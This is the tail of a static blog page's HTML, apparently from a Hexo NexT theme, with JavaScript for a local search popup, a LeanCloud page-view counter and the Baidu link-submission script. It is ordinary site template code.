// sort index by position of keyword
|
||
|
||
[indexOfTitle, indexOfContent].forEach(function (index) {
|
||
index.sort(function (itemLeft, itemRight) {
|
||
if (itemRight.position !== itemLeft.position) {
|
||
return itemRight.position - itemLeft.position;
|
||
} else {
|
||
return itemLeft.word.length - itemRight.word.length;
|
||
}
|
||
});
|
||
});
|
||
|
||
// merge hits into slices
|
||
|
||
function mergeIntoSlice(text, start, end, index) {
|
||
var item = index[index.length - 1];
|
||
var position = item.position;
|
||
var word = item.word;
|
||
var hits = [];
|
||
var searchTextCountInSlice = 0;
|
||
while (position + word.length <= end && index.length != 0) {
|
||
if (word === searchText) {
|
||
searchTextCountInSlice++;
|
||
}
|
||
hits.push({position: position, length: word.length});
|
||
var wordEnd = position + word.length;
|
||
|
||
// move to next position of hit
|
||
|
||
index.pop();
|
||
while (index.length != 0) {
|
||
item = index[index.length - 1];
|
||
position = item.position;
|
||
word = item.word;
|
||
if (wordEnd > position) {
|
||
index.pop();
|
||
} else {
|
||
break;
|
||
}
|
||
}
|
||
}
|
||
searchTextCount += searchTextCountInSlice;
|
||
return {
|
||
hits: hits,
|
||
start: start,
|
||
end: end,
|
||
searchTextCount: searchTextCountInSlice
|
||
};
|
||
}
|
||
|
||
var slicesOfTitle = [];
|
||
if (indexOfTitle.length != 0) {
|
||
slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
|
||
}
|
||
|
||
var slicesOfContent = [];
|
||
while (indexOfContent.length != 0) {
|
||
var item = indexOfContent[indexOfContent.length - 1];
|
||
var position = item.position;
|
||
var word = item.word;
|
||
// cut out 100 characters
|
||
var start = position - 20;
|
||
var end = position + 80;
|
||
if(start < 0){
|
||
start = 0;
|
||
}
|
||
if (end < position + word.length) {
|
||
end = position + word.length;
|
||
}
|
||
if(end > content.length){
|
||
end = content.length;
|
||
}
|
||
slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
|
||
}
|
||
|
||
// sort slices in content by search text's count and hits' count
|
||
|
||
slicesOfContent.sort(function (sliceLeft, sliceRight) {
|
||
if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
|
||
return sliceRight.searchTextCount - sliceLeft.searchTextCount;
|
||
} else if (sliceLeft.hits.length !== sliceRight.hits.length) {
|
||
return sliceRight.hits.length - sliceLeft.hits.length;
|
||
} else {
|
||
return sliceLeft.start - sliceRight.start;
|
||
}
|
||
});
|
||
|
||
// select top N slices in content
|
||
|
||
var upperBound = parseInt('1');
|
||
if (upperBound >= 0) {
|
||
slicesOfContent = slicesOfContent.slice(0, upperBound);
|
||
}
|
||
|
||
// highlight title and content
|
||
|
||
function highlightKeyword(text, slice) {
|
||
var result = '';
|
||
var prevEnd = slice.start;
|
||
slice.hits.forEach(function (hit) {
|
||
result += text.substring(prevEnd, hit.position);
|
||
var end = hit.position + hit.length;
|
||
result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
|
||
prevEnd = end;
|
||
});
|
||
result += text.substring(prevEnd, slice.end);
|
||
return result;
|
||
}
|
||
|
||
var resultItem = '';
|
||
|
||
if (slicesOfTitle.length != 0) {
|
||
resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
|
||
} else {
|
||
resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
|
||
}
|
||
|
||
slicesOfContent.forEach(function (slice) {
|
||
resultItem += "<a href='" + articleUrl + "'>" +
|
||
"<p class=\"search-result\">" + highlightKeyword(content, slice) +
|
||
"...</p>" + "</a>";
|
||
});
|
||
|
||
resultItem += "</li>";
|
||
resultItems.push({
|
||
item: resultItem,
|
||
searchTextCount: searchTextCount,
|
||
hitCount: hitCount,
|
||
id: resultItems.length
|
||
});
|
||
}
|
||
})
|
||
};
|
||
if (keywords.length === 1 && keywords[0] === "") {
|
||
resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
|
||
} else if (resultItems.length === 0) {
|
||
resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
|
||
} else {
|
||
resultItems.sort(function (resultLeft, resultRight) {
|
||
if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
|
||
return resultRight.searchTextCount - resultLeft.searchTextCount;
|
||
} else if (resultLeft.hitCount !== resultRight.hitCount) {
|
||
return resultRight.hitCount - resultLeft.hitCount;
|
||
} else {
|
||
return resultRight.id - resultLeft.id;
|
||
}
|
||
});
|
||
var searchResultList = '<ul class=\"search-result-list\">';
|
||
resultItems.forEach(function (result) {
|
||
searchResultList += result.item;
|
||
})
|
||
searchResultList += "</ul>";
|
||
resultContent.innerHTML = searchResultList;
|
||
}
|
||
}
|
||
|
||
if ('auto' === 'auto') {
|
||
input.addEventListener('input', inputEventFunction);
|
||
} else {
|
||
$('.search-icon').click(inputEventFunction);
|
||
input.addEventListener('keypress', function (event) {
|
||
if (event.keyCode === 13) {
|
||
inputEventFunction();
|
||
}
|
||
});
|
||
}
|
||
|
||
// remove loading animation
|
||
$(".local-search-pop-overlay").remove();
|
||
$('body').css('overflow', '');
|
||
|
||
proceedsearch();
|
||
}
|
||
});
|
||
}
|
||
|
||
// handle and trigger popup window;
|
||
$('.popup-trigger').click(function(e) {
|
||
e.stopPropagation();
|
||
if (isfetched === false) {
|
||
searchFunc(path, 'local-search-input', 'local-search-result');
|
||
} else {
|
||
proceedsearch();
|
||
};
|
||
});
|
||
|
||
$('.popup-btn-close').click(onPopupClose);
|
||
$('.popup').click(function(e){
|
||
e.stopPropagation();
|
||
});
|
||
$(document).on('keyup', function (event) {
|
||
var shouldDismissSearchPopup = event.which === 27 &&
|
||
$('.search-popup').is(':visible');
|
||
if (shouldDismissSearchPopup) {
|
||
onPopupClose();
|
||
}
|
||
});
|
||
</script>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
|
||
<script>AV.initialize("EWwoJgHNdlj6iBjiFlMcabUO-gzGzoHsz", "x8FxDrYG79C8YFrTww9ljo8K");</script>
|
||
<script>
|
||
function showTime(Counter) {
|
||
var query = new AV.Query(Counter);
|
||
var entries = [];
|
||
var $visitors = $(".leancloud_visitors");
|
||
|
||
$visitors.each(function () {
|
||
entries.push( $(this).attr("id").trim() );
|
||
});
|
||
|
||
query.containedIn('url', entries);
|
||
query.find()
|
||
.done(function (results) {
|
||
var COUNT_CONTAINER_REF = '.leancloud-visitors-count';
|
||
|
||
if (results.length === 0) {
|
||
$visitors.find(COUNT_CONTAINER_REF).text(0);
|
||
return;
|
||
}
|
||
|
||
for (var i = 0; i < results.length; i++) {
|
||
var item = results[i];
|
||
var url = item.get('url');
|
||
var time = item.get('time');
|
||
var element = document.getElementById(url);
|
||
|
||
$(element).find(COUNT_CONTAINER_REF).text(time);
|
||
}
|
||
for(var i = 0; i < entries.length; i++) {
|
||
var url = entries[i];
|
||
var element = document.getElementById(url);
|
||
var countSpan = $(element).find(COUNT_CONTAINER_REF);
|
||
if( countSpan.text() == '') {
|
||
countSpan.text(0);
|
||
}
|
||
}
|
||
})
|
||
.fail(function (object, error) {
|
||
console.log("Error: " + error.code + " " + error.message);
|
||
});
|
||
}
|
||
|
||
function addCount(Counter) {
|
||
var $visitors = $(".leancloud_visitors");
|
||
var url = $visitors.attr('id').trim();
|
||
var title = $visitors.attr('data-flag-title').trim();
|
||
var query = new AV.Query(Counter);
|
||
|
||
query.equalTo("url", url);
|
||
query.find({
|
||
success: function(results) {
|
||
if (results.length > 0) {
|
||
var counter = results[0];
|
||
counter.fetchWhenSave(true);
|
||
counter.increment("time");
|
||
counter.save(null, {
|
||
success: function(counter) {
|
||
var $element = $(document.getElementById(url));
|
||
$element.find('.leancloud-visitors-count').text(counter.get('time'));
|
||
},
|
||
error: function(counter, error) {
|
||
console.log('Failed to save Visitor num, with error message: ' + error.message);
|
||
}
|
||
});
|
||
} else {
|
||
var newcounter = new Counter();
|
||
/* Set ACL */
|
||
var acl = new AV.ACL();
|
||
acl.setPublicReadAccess(true);
|
||
acl.setPublicWriteAccess(true);
|
||
newcounter.setACL(acl);
|
||
/* End Set ACL */
|
||
newcounter.set("title", title);
|
||
newcounter.set("url", url);
|
||
newcounter.set("time", 1);
|
||
newcounter.save(null, {
|
||
success: function(newcounter) {
|
||
var $element = $(document.getElementById(url));
|
||
$element.find('.leancloud-visitors-count').text(newcounter.get('time'));
|
||
},
|
||
error: function(newcounter, error) {
|
||
console.log('Failed to create');
|
||
}
|
||
});
|
||
}
|
||
},
|
||
error: function(error) {
|
||
console.log('Error:' + error.code + " " + error.message);
|
||
}
|
||
});
|
||
}
|
||
|
||
$(function() {
|
||
var Counter = AV.Object.extend("Counter");
|
||
if ($('.leancloud_visitors').length == 1) {
|
||
addCount(Counter);
|
||
} else if ($('.post-title-link').length > 1) {
|
||
showTime(Counter);
|
||
}
|
||
});
|
||
</script>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<script>
|
||
(function(){
|
||
var bp = document.createElement('script');
|
||
var curProtocol = window.location.protocol.split(':')[0];
|
||
if (curProtocol === 'https') {
|
||
bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
|
||
}
|
||
else {
|
||
bp.src = 'http://push.zhanzhang.baidu.com/push.js';
|
||
}
|
||
var s = document.getElementsByTagName("script")[0];
|
||
s.parentNode.insertBefore(bp, s);
|
||
})();
|
||
</script>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
</body>
|
||
</html>
|